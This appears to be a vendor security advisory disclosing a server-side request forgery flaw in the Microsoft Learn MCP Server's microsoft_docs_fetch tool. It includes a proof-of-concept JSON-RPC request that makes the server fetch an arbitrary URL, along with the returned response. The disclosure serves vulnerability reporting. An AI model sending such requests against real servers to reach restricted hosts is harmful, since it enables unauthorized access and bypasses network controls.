The Microsoft Learn MCP Server is a remote Model Context Protocol based server that enables clients like GitHub Copilot and other AI agents to bring trusted and up-to-date information directly from Microsoft's official documentation.
Microsoft Lean MCP Server is available at https://learn.microsoft.com/api/mcp. This MCP server currently offers two tools to MCP clients as described as following:
Microsoft Documentation MCP Server\r\n\r\nThis server gives structured access to official Microsoft and Azure documentation via two tools:\r\n\r\n## Tools\r\n\r\n### microsoft_docs_search\r\nSearch official documentation and return up to 10 concise, high-quality content chunks (max 500 tokens each), including title, URL, and excerpt.\r\n\r\n- Use first to get a quick, reliable overview\r\n- Ideal for grounding answers in Microsoft knowledge\r\n\r\n### microsoft_docs_fetch\r\nFetch and convert full Microsoft documentation pages to markdown.\r\n\r\n- Use after search when you need full content from a specific URL\r\n- Required for detailed tutorials, troubleshooting, prerequisites, or when search results are incomplete or outdated\r\n\r\n## Workflow\r\n\r\n1. Use \u0060microsoft_docs_search\u0060 to find relevant content \r\n2. If deeper or complete information is needed, use \u0060microsoft_docs_fetch\u0060\r\n\r\n**Search gives breadth. Fetch gives depth.**\r\n\r\nAll content comes from Microsoft Learn or official sources, returned in clean markdown format
The microsoft_docs_fetch tool is described as following and allows a MCP client to request for a specific documentation page from the microsoft.com domain:
{"name":"microsoft_docs_fetch","description":"Fetch and convert a Microsoft Learn documentation page to markdown format. This tool retrieves the latest complete content of Microsoft documentation pages including Azure, .NET, Microsoft 365, and other Microsoft technologies.\n\n## When to Use This Tool\n- When search results provide incomplete information or truncated content\n- When you need complete step-by-step procedures or tutorials\n- When you need troubleshooting sections, prerequisites, or detailed explanations\n- When search results reference a specific page that seems highly relevant\n- For comprehensive guides that require full context\n\n## Usage Pattern\nUse this tool AFTER microsoft_docs_search when you identify specific high-value pages that need complete content. The search tool gives you an overview; this tool gives you the complete picture.\n\n## URL Requirements\n- The URL must be a valid Microsoft documentation link from the microsoft.com domain.\n\n## Output Format\nThe output is formatted as markdown with preserved headings, code blocks, tables, and links converted to markdown format.\n","inputSchema":{"type":"object","properties":{"url":{"description":"URL of the Microsoft documentation page to read","type":"string"}},"required":["url"]}}
Due to a lack of validation on the MCP server tool, it is possible for a remote and unauthenticated attack to specify any host, leaving it open to Server-Side Request Forgery.
Proof-Of Concept
The following request shows that the server connects to any URL and provides the response converted as markdown:
POST /api/mcp HTTP/1.1
Host: learn.microsoft.com
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36
Accept: application/json,text/event-stream
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 138
Connection: keep-alive
{"method":"tools/call","params":{
"name": "microsoft_docs_fetch",
"arguments": {"url": "https://google.com"}},"jsonrpc":"2.0","id":2}
And the response provided by the MCP server:
event: message
data: {"result":{"content":[{"type":"text","text":"**Search**[Images](https://www.google.com/imghp?hl=en\u0026tab=wi)[Maps](https://maps.google.com/maps?hl=en\u0026tab=wl)[Play](https://play.google.com/?hl=en\u0026tab=w8)[YouTube](https://www.youtube.com/?tab=w1)[News](https://news.google.com/?tab=wn)[Gmail](https://mail.google.com/mail/?tab=wm)[Drive](https://drive.google.com/?tab=wo)[More \u00BB](https://www.google.com/intl/en/about/products?tab=wh)\r\n\r\n[Web History](http://www.google.com/history/optout?hl=en) | [Settings](/preferences?hl=en) | [Sign in](https://accounts.google.com/ServiceLogin?hl=en\u0026passive=true\u0026continue=https://www.google.com/\u0026ec=GAZAAQ)\r\n\r\n| | | [Advanced search](/advanced_search?hl=en\u0026amp;authuser=0) |\r\n| --- | --- | --- |\r\n\r\n[Advertising](/intl/en/ads/)[Business Solutions](/services/)[About Google](/intl/en/about.html)\r\n\r\n\u00A9 2025 - [Privacy](/intl/en/policies/privacy/) - [Terms](/intl/en/policies/terms/)"}]},"id":2,"jsonrpc":"2.0"}
By leveraging this vulnerability, a remote and unauthenticated attacker could make the Microsoft Learn MCP Server perform arbitrary HTTP requests and bypass network restrictions in some circumstances.
Contact our sales team